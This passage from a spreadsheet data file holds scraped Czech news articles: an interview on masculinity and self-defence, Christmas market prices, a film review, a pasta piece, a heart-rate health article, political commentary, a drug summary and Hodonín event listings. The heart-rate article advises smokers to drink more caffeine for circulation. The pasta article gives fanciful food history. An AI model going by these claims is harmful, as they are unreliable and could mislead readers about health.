mužskou. Začneme se dívat i na to, jak systém dopadá na muže, otevřeme témata, která je ovlivňují a redefinujeme, jak k mužství přistupujeme. Je důležité říct, že to ale neznamená, že bychom to překlopili do nějakého opaku nebo karikatury. Když se řekne, že narušujeme koncept mužství, dost lidí si představí vyhrocený opak – třeba kluka, který má 55 kilo, nalakované nehty, dlouhé vlasy a nosí šaty. Pokud to někdo dělá, je to samozřejmě v pořádku, nechci to shazovat, ale rozhodně to není jediná cesta, jak narušování tradičního mužství musí vypadat. Je v pořádku narušovat podoby mužství a naučit se o problémech mluvit a říct si o pomoc. Nikomu to neubere na mužnosti. Stejně tak je v pořádku nehrát si pořád na tvrďáka, ale projevit laskavost a citlivost. Koneckonců když se podíváme na výzkumy, většina žen přesně tohle od svého partnera chce. Dřív byl muž vnímán jako chlapák, živitel rodiny, lídr, ten, kdo všechno řídí. Jenže tohle mizí a mužská role je zpochybněná. A dojdeme k tomu podle vás přirozeně? Nevím, jestli k tomu přirozeně dojdeme. Dojdeme k tomu, když se o těch věcech budeme bavit a začneme je jako společnost řešit. A k tomu budeme potřebovat i ženy. Je evidentní, že jak jsme v tomhle pozadu, sami to nezvládneme. Samozřejmě většina práce je na nás mužích. Stejně jako se zformovalo ženské hnutí, bude se muset zformovat i mužské hnutí – takové, které ten tradiční obraz bude narušovat, ne na něj navazovat. Teď je na nás, abychom ta témata začali zvedat a řešit si je. A až to začneme dělat, přijde chvíle, kdy budeme potřebovat ženy jako spojence. Chodí k vám na kurzy sebeobrany také muži? Chodí, je to přibližně třetina nebo čtvrtina. Většina našich kurzů je sestavená tak, že jsou pro všechny. A setkali jste se s tím, že mužům brání stereotypy v tom, aby si přiznali, že potřebují pomoct, potřebují se naučit sebeobranu? Pokud má někdo tenhle přístup nazírání na svět, kdy chce být ten tvrďák a bojovník, tak k nám nepřijde. Takový člověk spíš půjde na MMA nebo někam, kde se naučí bojovat. Ale je spousta mužů – podle mě možná i většina – kteří se někdy v životě ocitnou v situacích, kdy jsou blízko nějakému násilí. Mohou být třeba jeho svědky. Velmi často k nám chodí tátové od rodiny, kteří jdou s dítětem, nějakou situaci vidí a pak si řeknou: „Co mám dělat?“ Mají s sebou dítě, takže utíkat nemůžou. Zároveň ale nemají povahu rváče. Moderní sebeobrana jim nabídne strategii, jak se do konfliktu vůbec nedostat, jak ho uklidnit a vyhnout se násilí. Neuděláme z nikoho rváče, ale zároveň je naučíme, jak se rozumně fyzicky bránit, když to jinak nejde. Autor: Dominika Machová Autor person Dominika Machová Rubrika transition_slide Rozhovory</t>
  </si>
  <si>
    <t>343000</t>
  </si>
  <si>
    <t>331840</t>
  </si>
  <si>
    <t>20241201_276_3474598592_6802c6c56264d3043212.html</t>
  </si>
  <si>
    <t>6802c6c56264d3043212</t>
  </si>
  <si>
    <t>Za kolik mají svařák, klobásu nebo hermelín na poděbradském Vánočním trhu</t>
  </si>
  <si>
    <t>Za kolik mají svařák, klobásu nebo hermelín na poděbradském Vánočním trhu Součástí trhů je pochopitelně nabídka dobrého občerstvení v podobě tradičního svařeného vína , horkého punče a dalších nápojů, kávy nebo třeba pro děti horkého moštu. Za chladného počasí je taky dobré potěšit žaludek nějakou příjemnou stravou, a ani o tu není nouze. My jsme hned první víkend zmapovali ceny, za které se dá na poděbradských trzích najíst a napít. Přehlednou tabulku nabízíme na konci textu. Začněme u těch nejžádanějších nápojů. Svařák oproti loňsku nepodražil, a u stánku místního Rotary clubu se dá stejně jako horký punč pořídit dvě deci za šedesát korun. Stejně stojí populární místní likér Samička. U daného stánku platí známé rčení, že děti platí polovic. Teplý mošt je k dispozici totiž za 30 korun. Poslední listopadový pátek dvě hodiny po poledni začaly na poděbradské kolonádě Vánoční trhy. | Video: Deník/ Miroslav S. Jilemnický U dalších stánků se svařákem stojí jen o pět korun víc, tedy 65 korun. Provozovatelé nabízí bílou i červenou variantu voňavé pochoutky. Vánočním nápojem je také vaječný likér. I ten se dá koupit, dvojdecka vyjde na rovných 100 korun, půllitr pak na 160. K dohledání je i stánek nabízející kávu praženou přímo v místní pražírně. Espresso se prodává za 49 korun, cappuccino na 59 a latté za 79. K dispozici jsou samozřejmě i další druhy kávy. Poslední listopadový pátek dvě hodiny po poledni začaly na poděbradské kolonádě Vánoční trhy. | Video: Deník/ Miroslav S. Jilemnický Ohledně jídla jsou v nabídce například teplé polévky. Narazili jsme na gulášovou a frankfurtskou, v obou případech za 50 korun. Stejně stojí i párek v rohlíku. Grilovaná klobása vyjde na 105 až 110 korun. Je možné si objednat i grilovaný camembert za 80 korun. Gurmáni si pak pochutnají na pražených červících za 135 korun. Pravda, k vánočním trhům patří spíše sladkosti. Neodmyslitelný je trdelník, který je nabízený v řadě variant. Tradiční vanilkový, oříškový, skořicový, či kokosový vyjde na 80 korun. S Nutellou, marmeládou nebo sušenkami stojí 100 korun. Speciální verze s Nutellou, ovocem a šlehačkou, případně se sušenkami a šlehačkou vyjde na 150 korun. Kdo si dá raději palačinku, má také bohatý výběr z mnoha variant. Od nejjednodušší s cukrem a skořicí za 90 korun, až po třeba s Nutellou a banánem za 119 korun. Palačinky však nutně nemusí být na sladko. V nabídce jsou třeba i verze se šunkou a modrým sýrem za 109 korun, nebo s čedarem a jalapeňos za 119. Autor: Miroslav S. Jilemnický Autor person Miroslav S. Jilemnický</t>
  </si>
  <si>
    <t>17900</t>
  </si>
  <si>
    <t>20241201_277_3474548747_54047a08005520850258.html</t>
  </si>
  <si>
    <t>54047a08005520850258</t>
  </si>
  <si>
    <t>Nalezeno v překladu ⭐ 65% [A Traveler's Needs</t>
  </si>
  <si>
    <t>Nalezeno v překladu ⭐ 65% [A Traveler's Needs Nesoudný Coppola , íránská cenzura i oslava násilí. Přehlídka Be2Can láká na festivalovou elitu Tvrdí, že pochází z Francie , ale nikdo není schopen s jistotou říct, že je to pravda. Vídají ji vysedávat na lavičce v parku, kde hraje na zobcovou flétnu. Protože nemá žádné peníze, začne dvě Korejky učit francouzsky. Také ráda chodí bosa a polehává na skalách, které jsou tvrdé a drsné jako život sám. Pokud chce trochu měkkého pohodlí, napije se svého oblíbeného rýžového vína . Film Nalezeno v překladu (A Traveler’s Needs) s Isabelle Huppert v hlavní roli, vyznamenaný na Berlinale v roce 2024 Velkou cenou poroty, je dalším z minimalistických počinů jihokorejského klasika Sang-soo Honga. 65 %</t>
  </si>
  <si>
    <t>74210</t>
  </si>
  <si>
    <t>20241201_278_3474522503_ca8eb5dc93fa230d5836.html</t>
  </si>
  <si>
    <t>ca8eb5dc93fa230d5836</t>
  </si>
  <si>
    <t>Pasta, která mění svět: Objevte tajemství fettuccine, které nadchne vaše chuťové pohárky</t>
  </si>
  <si>
    <t>Pasta, která mění svět: Objevte tajemství fettuccine, které nadchne vaše chuťové pohárky autor: Redakce Nezdrave.cz | 01.12.2024 | Jídlo Když se řekne „pasta“, většina z nás si představí útulnou italskou restauraci, lahodnou omáčku a sklenku vína , kterou si s radostí objednáme. Je to totiž jídlo, které spojuje lidi napříč generacemi, a co víc, dokáže vyřešit nejednu existenciální krizi. V tomhle článku se podíváme na to, proč byste vůbec měli zapomenout na rychlá jídla a raději trávit čas s vlastními ručně vyrobenými nudlemi. Pojďme se ponořit do světa fettuccine a jeho nečekaných kouzel. Fettuccine: Více než jen nudle Myslíte si, že nudle jsou nudné? Tak to se šeredně mýlíte. Fettuccine, jedna z nejznámějších italských těstovin, je nejen lahodné jídlo, ale také má zajímavou historii. Původně se tohle skvostné jídlo, jehož název pochází z latinského „fettucia“ (což znamená „malý kousek“), podávalo pouze na svatbách. Ano, správně, fettuccine svaté. Kdo by to byl řekl! A víte co je ještě překvapivější? Na konci 19. století bylo považováno za lék na zažívací potíže. Dnes už se to sice neaplikuje, ale kdo by se divil, že dobrou pastou si zlepšíte náladu. Když se dostanete k přípravě fettuccine doma, očekávejte, že váš kuchyňský stůl se promění v experimentální laboratoř, kde se mísí věda a umění. Než budete moci potěšit své chuťové pohárky, budete muset projít procesem výroby těstovin. Od mletí mouky po vymíchání vajec – nebojte se, váš vnitřní Gordon Ramsay se nezklame. Odborníci doporučují vyzkoušet domácí variaci, jen tak se dozvíte, jak skutečné fettuccine chutná, než se zase vrhnete na to instantní z obchodního centra. Omáčka, která do každé misky vnesla lásku Jakmile máte hotové těstoviny, přichází ta pravá magie – omáčka. Nejčastěji se podává s krémovou omáčkou Alfredo, která je tak bohatá, že pravděpodobně zničí vaše plány na hubnutí. Ale co si budeme povídat, kdo by nechtěl zaslechnout vzdychání po prvním soustu, které se vám dostane do pusy? Nechte se unést fantazií a zkuste kombinovat ingredience, které souvisejí s vaším osobním stylem. Hodí se ryby, cítíte-li se jako na Sardinii , nebo klidně něco „na divoko“ s kuřecím masem a sušenými rajčaty. Experimentování v kuchyni je přesně to, co potřebujete, když chcete zapomenout na pracovní povinnosti. Pojďme si ještě říct něco o fenoménu, který obklopuje fettuccine. Na sociálních sítích kolují obrázky dokonale servírovaných talířů, na kterých hrdě sedí fetttucine s nadýchaným parmazánem. Ostatní lidé se snaží znovu vytvořit to, co s nimi značkoví food bloggeři udělali v jejich moderních kuchyních. Někdy si připadáme jako konkurenti ve hře „kdo udělá hezčí fotku talíře“, ale ve skutečnosti byste se měli zaměřit na to, jak chutná a jak vám to zvedne náladu po náročném dni. Když se dostanete k fettuccine, nezapomeňte, že vychutnávání jídla je jako lezení po horách – někdy narazíte na skály, ale odměnou vám bude nádherný výhled. Italové říkají, že jídlo má být sdíleno, takže pozvěte přátele, přiložte si pořádný talíř makarónů a s chutí si užijte každý sousto. Zpříjemněte si život, dokud ještě můžete, a při tom nezapomínejte, že jak fettuccine, tak i vy sami, jste výjimeční. Clube de culinária, o kterém se mluví ještě týdny po večeři, je na dosah ruky. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241201_279_3474513030_091cd3489b813daaca71.html</t>
  </si>
  <si>
    <t>091cd3489b813daaca71</t>
  </si>
  <si>
    <t>Tohle se vám vaše tělo snaží říct, pokud pocítíte náhlé zrychlení srdečního tepu</t>
  </si>
  <si>
    <t>Tohle se vám vaše tělo snaží říct, pokud pocítíte náhlé zrychlení srdečního tepu Náhle zrychlený srdeční tep může být známkou toho, že s vaším zdravím není něco v pořádku. Zbavit se ho však můžete zcela přirozeně. V současné době plné stresu a vyčerpání se čím dál více lidí potýká s různou formou srdečního onemocnění či problémů týkajících se krevního oběhu. Nezřídka se také stává, že lidem začíná z ničeho nic prudce bít srdce, což je mnohdy doprovázeno různými dalšími nepříjemnými příznaky. Pokud s tím máte zkušenosti i vy, rozhodně byste to dle lékaře Uzochukwu Ibe neměli ignorovat, protože by mohlo jít o závažnější problém. Zrychlený srdeční tep a jak ho zmírnit Náhle zrychlený srdeční tep může mít řadu příčin, a to od chronického onemocnění až po vážné problémy se srdcem. Nikdy byste tyto potíže neměli brát na lehkou váhu, protože jinak se můžete dostat do vážného nebezpečí. Nechte si proto raději udělat patřičné testy a poté konzultujte s odborníkem, co dále. Pokud vás však tento příznak postihl náhle a nevíte, co dělat, zhluboka se několikrát nadechněte a pak vydechněte. Následně vypijte sklenici čerstvé studené vody. Tímto způsobem byste měli své srdce opět zklidnit, takže tepová frekvence začne pomalu upadat. Pozor by si poté měli dávat ti, kteří hodně kouří, protože to může příznaky ještě zhoršovat. Podle webu Healthline je v takovém případě dobré pít více kofeinových nápojů, které krevní oběh oproti cigaretám posilují. Problém můžete zmírnit také snížením konzumace alkoholu a pravidelnou fyzickou aktivitou. Tyto druhy bolestí hlavy většina lidí nedokáže odlišit. Příčina je úplně jiná, než si myslíte Co se týká dalších příznaků, které mohou být spojeny se zrychleným srdečním tepem, patří mezi ně zejména únava a vyčerpání, závratě, potíže s dýcháním a pocit tlaku na hrudi. Pokud by i přes výše uvedenou techniku tyto problémy přetrvávaly, raději vyhledejte lékaře, protože na vině může být něco závažnějšího. Na Zdravém Stravování jsme také psali o spánkové poruše, kterou má většina lidí tendenci ignorovat. 2. prosince 2019 Gabriela K Obuv s vysokým podpatkem je populárnější než kdy jindy. A mnoho žen se ptá, zda je nošení této obuvi skutečně tak špatné? Nositelky vysokých podpatků mívají mnohem častěji zdravotní problémy týkající se nohou, kolen, zad. Ortopedičtí specialisté vidí většinou jako první příčinu těchto bolestí právě v nošení nevhodné obuvi. Tedy obuvi s velmi vyvýšenou patou. […] 28. října 2023 Lenka Burešová Pokud na svém blízkém zaznamenáte tyto příznaky, pravděpodobně se jeho dny chýlí ke konci. Odborníci prozradili, jak poznat, zda přichází obávaná smrt. Smrt je pochmurné téma, o kterém se neradi bavíme. Bohužel je však přirozenou […] 10. března 2020 Lenka Burešová Chcete-li zhubnout, je základním požadavkem především to, aby vám správně fungoval metabolismus. Vlivem řady faktorů dnes ale mnoho lidí bojuje s tím, že jejich látková výměna není optimální. Dříve než se pustíte do hubnutí, je na místě podívat se pořádně na stav vašeho těla a v případě potřeby se nejprve zaměřit na aktivaci metabolismu. […] 19. června 2024 Lenka Burešová Pokud se pravidelně potýkáte s krvácením z nosu, může být na vině řada vážných problémů. Raději to neignorujte a začněte hledat příčinu ihned. Krvácení z nosu čas od času zažívá každý, například při intenzivním smrkání nebo v důsledku […] 28. října 2024 Tereza Vohrlíková Bramborová pleťová maska nabízí hned několik zajímavých potenciálních zdravotních benefitů. Stačí ji začít aplikovat pravidelně. […] 27. října 2020 Lenka Burešová Kašlete, máte horečku, všechno vás bolí a cítíte se zkrátka špatně? Možná je to jen nachlazení. Ale co když je to Covid-19? Do výsledku testu to nelze vyloučit. Co dělat, pokud máte podezření, že jste se nakazili virem Covid-19? Jaké kroky byste měli postoupit jako první? Na to se nyní podíváme a zodpovíme základní otázky, které trápí v současnosti snad všechny. […] Vyhledávání Autor: Lenka Burešová Autor person Lenka Burešová Rubrika transition_slide Rady a tipy</t>
  </si>
  <si>
    <t>2440</t>
  </si>
  <si>
    <t>20241201_28_3478965477_23b54ee837368601d4d1.html</t>
  </si>
  <si>
    <t>23b54ee837368601d4d1</t>
  </si>
  <si>
    <t>Fiala chválil vládu. Řada dobrých nápadů ale zůstala ležet na stole, tvrdí ekonom</t>
  </si>
  <si>
    <t>Fiala chválil vládu. Řada dobrých nápadů ale zůstala ležet na stole, tvrdí ekonom Marek Bruna 1. 12. 2024, 20:45 Podle premiéra Petra Fialy ( ODS ) se vládě podařilo naplnit 93 % slibů, ke kterým se zavázala. Z 560 bodů jich podle vládních představitelů kabinet splnil 520. Od některých novinek se ale očekávalo před nástupem kabinetu víc. A je otázkou, zda by měly mít všechny body v programovém prohlášení vlády stejnou váhu. Digitalizace Vládě se sice podařilo posunout se v digitalizaci veřejné správy, velkou kaňkou ale zůstává digitalizace stavebního řízení – systém, který měl ulehčit práci úředníkům, stavebníkům i projektantům, skončil fiaskem a odchodem jedné strany do opozice. "Ten systém má v tuhle chvíli tolik nefunkcionalit, že není plnohodnotný a některá řízení skutečně není možné dokončit," říká Jan Holický , předseda Sdružení tajemníků městských a obecních úřadů. Stabilizace veřejných financí a snižování rozpočtových schodků Kabinetu se podle ekonomů daří snižovat státní dluh a rozpočtové schodky, tempo by ale mohlo být podstatně rychlejší. Návrhy Národní ekonomické rady vlády (NERV), které by k tomu přispěly, ale nedopadají na úrodnou půdu. "NERV připravil poměrně velký seznam žádoucích bodů pro obnovení ekonomického růstu i pro tu konsolidaci veřejných financí a spousta dobrých návrhů, proti kterým nelze nic odborně namítat, tak zůstala ležet na stole," domnívá se ekonom Vít Hradil . Mezi ně patří například snížení počtu samospráv, flexibilnější podmínky na trhu práce i zdanění tichého vína , které po dlouhých debatách zřejmě není na pořadu dne. Že bude vláda v sazbě spotřební daně zohledňovat škodlivost, bylo také jedním z vládních slibů. Role tripartity Vláda chtěla zachovat důležitou roli tripartity – tedy že jednání mezi ní, odbory a zaměstnavateli budou konstruktivní, za konstruktivní je ale odboráři neoznačují. "Musím říct, že z lidského hlediska se s ministry rozhodně komunikovat dá, co se ale týká sociálního dialogu, tzn. hledání nějaké shody společně se zaměstnavateli, s námi, tak to dopadlo většinou tak, že když jsme se dohodli, tak ve finále to vláda byla schopná shodit ze stolu," poznamenal Josef Středula , předseda Českomoravské konfederace odborových svazů. Ve svém programovém prohlášením vláda slíbila ale také to, že vybere českého národního ptáka. Zda se jím stane sokol, sojka, ledňáček nebo jiný opeřenec, ale ani po třech letech nevíme. eva, TN.cz Autor: Marek Bruna Autor Marek Bruna</t>
  </si>
  <si>
    <t>464730</t>
  </si>
  <si>
    <t>20241201_280_3474829302_4365b2a31e538a817609.html</t>
  </si>
  <si>
    <t>4365b2a31e538a817609</t>
  </si>
  <si>
    <t>YLPIO</t>
  </si>
  <si>
    <t>YLPIO telmisartanum 80 mg / indapamidum 2,5 mg Zkrácené informace o léčivém přípravku Ylpio 80 mg / 2,5 mg tablety. Složení: Telmisartanum 80 mg a indapamidum 2,5 mg v 1 tabletě. Indikace: Substituční terapie esenciální hypertenze u dospělých pacientů, jejichž krevní tlak je kontrolován kombinací telmisartanu a indapamidu podávanými současně ve stejných dávkách, jako jsou v kombinaci. Kontraindikace: Hypersenzitivita na léčivé látky, sulfonamidy nebo pomocné látky, těžká porucha funkce jater nebo jaterní encefalopatię, těžká porucha funkce ledvin, hypokalemie, obštrukční poruchy žlučových cest. Kontraindikace během druhého a třetího trimestru těhotenství. Léčba přípravkem se během kojení nedoporučuje. Současné užívání telmisartanu s přípravky obsahujícími aliskiren je kontraindikováno u pacientů s diabetes mellitus nebo poruchou funkce ledvin (GFR &amp;lt; 60 ml/min/1,73 m2). Nežádoucí účinky: Související s telmisartanem: Infekce močových cest nebo horních cest dýchacích, hyperkalemie, synkopa, vertigo, bradykardie, kašel, průjem, dyspepsie, zvracení, pruritus, zvýšené pocení, kožní vyrážka, myalgie, poškození ledvin včetně akutního renálního selhání, bolesti na hrudi, astenie, zvýšení hladiny kreatininu v krvi. Související s indapamidem: Hypokalemie, únava, závratě, bolest hlavy, parestezie, nauzea, zvracení, zácpa, sucho v ústech, hypersenzitivní reakce, makulopapulární vyrážky, purpura, fotosenzitivita. Interakce: Kombinace telmisartanu s digoxinem může zvýšit hladinu digoxinu.Telmisartan může vyvolat hyperkalemii. Riziko se zvyšuje při kombinaci s dalšími látkami vyvolávajícími hyperkalemii (např. kalium šetřící diuretika, АСЕ inhibitory, NSAID, heparin,cyklosporin,takrolimus a trimethoprim). Kombinace, které nejsou doporučeny: Podání s draslík šetřícími diuretiky nebo přípravky obsahujícími draslík (např. spironolakton, amilorid, triamteren, náhražky soli obsahující draslík). Při nezbytnosti současného podávání je nutno často kontrolovat kalemii, případně EKG. Přípravek může zvyšovat plazmatickou koncentraci lithia. Kombinace vyžadující zvýšenou opatrnost: Nesteroidní protizánětlivé léky (NSAID) a kyselina salicylová (? 3 g/den) mohou snižovat antihypertenzní účinek. Při oslabené funkci ledvin může kombinace telmisartanu a přípravků blokujících cyklooxygenázu vést až к akutnímu selhání ledvin. U dehydratovaných pacientů hrozí riziko akutního renálního selháni. Předchozí léčba vysokými dávkami diuretik vede к riziku hypotenze po zahájení léčby telmisartanem. Kombinace s léčivy vyvolávajícími torsade de pointes (např. antiarytmika, některá antipsychotika, bepridil,erythromycin i.v.,pentamidin, moxifloxacin.vinkamin i.v.) zvyšuje riziko ventrikulárních arytmií,zvláště torsade de pointes. Je tedy třeba sledovat a korigovat hypokalemii a monitorovat elektrolyty a EKG. Doporučuje se používat látky, u kterých při hypokalemii nehrozí riziko torsade de pointes. Jiná léčiva způsobující pokles hladiny draslíku (např. i.v. amfotericin B, kortikosteroidy, tetrakosaktid, stimulující laxativa) zvyšují riziko hypokalemie (kalemie se má sledovat a korigovat). Hypokalemie predisponuje к toxickým účinkům digitalisu a při současné léčbě se doporučuje monitorování kalemie a EKG. Zvýšené opatrnosti je třeba rovněž dbát při kombinaci s АСЕ inhibitory (zejména v počátcích léčby a při depleci sodíku nebo při městnavém srdečním selhání) a je třeba brát v úvahu,že se nedoporučuje duální blokáda RAAS pomoci kombinovaného užívání inhibitorů АСЕ, blokátorů receptorů pro angiotenzin II nebo aliskirenu. Dále je třeba dbát zvýšené opatrnosti při kombinaci s baklofenem a alopurinolem. Kombinace, jež je nutno vzít v úvahu: Jiné antihypertenzní léky, imipraminová antidepresiva, neuroleptika, baklofen a amifostin mohou zvýšit antihypertenzní účinek. Ortostatická hypotenze může být potencována alkoholem , barbituráty, narkotiky nebo antidepresivy. Opatrnosti je dále třeba při kombinaci s metforminem (riziko laktátové acidózy), jodovanými kontrastními látkami, vápníkem, cyklosporinem.takrolimem a kortikosteroidy. Upozornění: Léčba nesmí být zahájena během těhotenství. Jestliže je zjištěno těhotenství, musí být léčba přípravkem ihned ukončena. Pacientům s oboustrannou stenózou renální arterie nebo se stenózou arterie zásobující jedinou funkční ledvinu hrozí během léčby zvýšené riziko těžké hypotenze a renální nedostatečnost. Thiazidům podobná diuretika jsou plně účinná pouze při normální nebo minimálně snížené funkci ledvin. U pacientů s poruchou renálních funkcí užívajících telmisartan se doporučuje sledování kalemie a kreatininemie. U pacientů s primárním aldosteronismem se léčba telmisartanem nedoporučuje. Je třeba věnovat zvýšenou pozornost pacientům trpícím stenózami aortální nebo mitrální chlopně nebo obštrukční hypertrofickou kardiomyopatií. Pravidelné sledování hladiny glukózy v krvi je důležité u diabetiků. U pacientů, jejichž cévní tonus a renální funkce závisejí převážně na aktivitě RAAS (např. u pacientů se závažným městnavým srdečním selháním nebo u pacientů s průvodním onemocněním ledvin, včetně stenózy renální arterie), může být léčba spojena s akutní hypotenzí, hyperazotemií, oligurií nebo vzácněji i s akutním selháním ledvin. U pacientů s poklesem intravaskulárního objemu nebo koncentrace sodíku (např. v důsledku diuretické terapie, omezování soli v dietě, průjmů nebo zvracení) se zejména po první dávce telmisartanu/indapamidu může objevit symptomatická hypotenze. Natremii je nutno stanovit před zahájením léčby a pravidelně kontrolovat, častěji u starších pacientů a u pacientů s cirhózou jater. U rizikových pacientů z hlediska hyperkalemie se doporučuje kalemii monitorovat. Je třeba zabránit vzniku hypokalemie, zejména u vysoce rizikových skupin pacientů, tj. u starších pacientů, podvyživených pacientů a/nebo nemocných osob, užívajících řadu léků současně, u cirhotiků s otoky a ascitem, u pacientů s onemocněním koronárních tepen, pacientů se srdečním selháním a osob s dlouhým ОТ intervalem. V těchto případech je třeba častěji kontrolovat a korigovat kalemii, stejně jako u pacientů užívajících srdeční glykosidy nebo látky způsobující torsade de pointes. Přípravek může způsobit přechodné zvýšení hladin vápníku v plazmě. Skutečná hyperkalcemie může být výsledkem nerozpoznané hyperparatyreózy. U nemocných se zvýšenou hladinou kyseliny močové hrozí záchvat dny. Sulfonamidy nebo deriváty sulfonamidů mohou způsobit idiosynkratickou reakci vedoucí k choroidální efuzi s defektem zorného pole, přechodné myopii a akutnímu glaukomu s uzavřeným úhlem. Při nadměrném snížení krevního tlaku u pacientů s ischemickou kardiopatií nebo s ischemickou chorobou srdeční může dojít к infarktu myokardu nebo к cévní mozkové příhodě. Dávkování a způsob podání: Doporučená dávka je jedna tableta denně. Při těžké poruše funkce ledvin (clearance kreatininu pod 30 ml/min), u hemodialyzovaných pacientů a při těžké poruše funkce jater je přípravek kontraindikován. U pacientů s lehkou až středně těžkou poruchou funkce jater je nutná úprava dávkování a dávka telmisartanu nemá překročit 40 mg telmisartanu denně. Tablety se užívají před jídlem, během jídla nebo po jídle s trochou tekutiny. Zvláštní opatření pro uchovávání: Uchovávejte v původním obalu, aby byl přípravek chráněn před světlem. Balení: 30 nebo 100 tablet po 80 mg (telmisartanum) / 2,5 mg (indapamidum). Datum revize textu: 30.8.2022. S podrobnějšími informacemi o přípravku se seznamte v SPC. Přípravek je vázán na lékařský předpis a je hrazen z prostředků zdravotního pojištění. Výrobce a držitel rozhodnutí o registraci: PRO.MED.CS Praha a.s.,Telčská 377/1, Michle , 140 00 Praha 4, Česká republika . Reference: 1. SmPC Ylpio 80 mg/2,5 mg tablety,datum poslední revize: 30.8.2022.2. Battershill AJ.,eřa/. Telmisartan: a review of its use in the management of hypertension. Drugs 2006; 66(1): 51-83. Erratum in: Drugs 2006; 66(15): 1987. 3. Leonetti G., et al. Tolerability and well-being with indapamide in the treatment of mild-moderate hypertension. An Italian multicenter study Am J Med 1988; 84(1 B): 59-64.4. Widimský J. jr., et al. Doporučení pro diagnostiku a léčbu arteriální hypertenze ČSH 2017. Hypertenze a kardiovaskulární prevence 2O18;Suppl7:l-19.5. Grassi G.,etal. Cardioprotective effects of telmisartan in uncomplicated and complicated hypertension. J Renin Angiotensin Aldosterone Syst 2008; 9(2): 66-74.6. Cibičková L. Vliv vybraných tříd antihypertenziv na metabolismus draslíku - dopady pro klinickou praxi. Farmakoterapeutická revue 2019; 5(4): 529-532. PRO.MED.CS Praha a.s. Telčská 377/1, Michle , 100 00 Praha 0, Česká republika www.promed.cz</t>
  </si>
  <si>
    <t>12750</t>
  </si>
  <si>
    <t>20241201_281_3474517856_4c29560a9754e337abf0.html</t>
  </si>
  <si>
    <t>4c29560a9754e337abf0</t>
  </si>
  <si>
    <t>KULTURNÍ SERVIS • VOLNÝ ČAS Dům kultury Hodonín Horní Valy 3747/6, 695 01 Hodonín www.dkhodonin.eu 1. 12. 2024 – 22. 12. 2024 Masarykovo náměstí Hodonín Vánoční jarmark Vánoce patří k neoblíbenějším svátkům v roce. Neodmyslitelnou součástí předvánoční atmosféry je i vánoční jarmark. Můžete se těšit na každodenní program z nějž vybíráme: 1. 12. 2024 – Zvonečkový průvod, Rozsvícení vánočního stromu a kapela REFLEXY 5. 12. 2024 – Mikulášská nadílka (pořádá Srdce pro Hodonín , Štěstí všem) 6. 12. 2024 – Vlasta Horváth 7. 12. 2024 – Easy Line 8. 12. 2024 – Shot – C 12. 12. 2024 – DH Podlužanka 13. 12. 2024 – Elis Mraz s kapelou 14. 12. 2024 – Průvod „Nesem Vám Vánoce“, Žalman &amp;amp; Spol 15. 12. 2024 – Kouzelné Vánoce s Majdou a Petrem – divadlo, Huménečko a Jan Klubus 17. 12. 2024 – Countrio – koncert 18. 12. 2024 – DCM Duběnka a DFS Duběnka 19. 12. 2024 – Centrum pro rodinu, Středisko volného času Hodonín a mažoretky Hodonín 20. 12. 2024 – Savana – koncert 21. 12. 2024 – Lada &amp;amp; kapel, Vyškovský Bigband a Charlie &amp;amp; Torzo 22. 12. 2024 – Vánoční pohádka – divadlo, Saxofonové trio Marka Kotači Více na www.dkhodonin.eu 3. 12. 2024 | 19.00–21.00 | Dům kultury Hodonín Růžové svatby Výstřední šedesátileté sestry Rose a Kathryn neměly nikdy snadný vztah. Teď však musí spolupracovat při organizování svatby dcery jedné z nich a přitom se vzájemně snášet. Optimistická a vtipná hra o sesterství, stárnutí, naději a o neustálých důvodech, proč se smát. Hrají: Michaela Dolinová a Vilma Cibulková Vstupné – 380 Kč/ ZTP 190 Kč 10. 12. 2024 | 18.00–20.00 | Dům kultury Hodonín ZUŠ – Vánoční koncert Pořadatel: Základní umělecká škola Hodonín , p.o. 11. 12. 2024 | 19.00–21.00 | Dům kultury Hodonín Bílé Vánoce Lucie Bílé II. Lucie Bílá s kapelou Petra Maláska za doprovodu Bílého pěveckého sboru s hostem Janem Toužimským. Délka programu: 120 minut včetně přestávky Vstupné od 1 100 Kč 12. 12. 2024 | 17.30–21.00 | Dům kultury Hodonín Závěrečná taneční lekce Závěrečná taneční lekce u příležitosti ukončení tanečního kurzu Společenský oděv a obuv nebo taneční obuv Vstupné 200 Kč/ absolventi kurzu zdarma 13. 12. 2024 | 18.00–20.00 | Dům kultury Hodonín Vánoční ozvěny ZUŠ Benefiční koncert pro ZUŠ Krnov . Pořadatel: Základní umělecká škola Hodonín , p.o. 26. 12. 2024 | 21.00–03.00 | Dům kultury Hodonín Štěpánská zábava PŘIPRAVUJEME NA LEDEN 2025 1. 1. 2025 – Novoroční ohňostroj 6. 1. 2025 – Novoroční koncert 10. 1. 2025 – Taneční ples 11. 1. 2025 – Farní ples 11. 1. – 12. 1. 2025 – Výběrové kolo Věneček z rozmarýnu 25. 1. 2025 – Reprezentační ples města Hodonína Kino Svět Hodonín Velkomoravská 1535/9, 695 01 Hodonín tel. pokladna 601 169 169, pokladna.kino@dkhodonin.cz, www.kinosvet.eu Kino | Senior Pravidelné projekce filmů za zvýhodněnou cenu (nejen) pro seniory. Snížená cena platí bez ohledu na věk. Ještě nejsem, kým chci být středa 4. 12. ve 14.30 malý sál dokument | Česko | česky Rok vdovy středa 4. 12. v 15.00 velký sál podle skutečné události | Česko | česky Další termíny Kino | Senior: 11. 12. a 18. 12. Kino | Festival Snow Film Fest 4. prosince | 19.20 Malý sál Každý rok od října do prosince do více než 150 českých a slovenských měst přináší SNOW FILM FEST ty nejlepší filmy o zimních sportech z celého světa i z domácí produkce. Tady Vary 4 | Bokovka 18. prosince | 19.30 Velký sál Červený koberec, úvod a speciální projekce. To vše vám přinese další ročník festivalu Tady Vary . Tentokrát s kultovní vinnou komedií Bokovka! Kino | Událost Premiérové záznamy divadelních her, speciální projekce, besedy a další RM: Right People, Wrong Place Dokument o k-popové hvězdě. 5. 12. | 17.30 6. 12. | 17.00 8. 12. | 14.30 André Rieu ’s 2024 Vánoční koncert 7. 12. | 16.30 8. 12. | 14.00 13. 12. | 16.30 15. 12. | 16.00 Louskáček | Královský balet 21. 12. | 16.30 Ukradené Vánoce | klasika 21. 12. | 20.00 Ježek Sonic 3 | předpremiéra 22. 12. | 13.10 Dvojprojekce Sám doma + Sám doma 2 22. 12. | 16.00 a 18.30 Galerie výtvarného umění v Hodoníně Úprkova 2, 695 01 Hodonín , tel. 518 351 051, e-mail: info@gvuhodonin.cz, www.gvuhodonin.cz Výtvarná dílna ornamentu s Kamilou | čtvrtek 5. 12. 2024 od 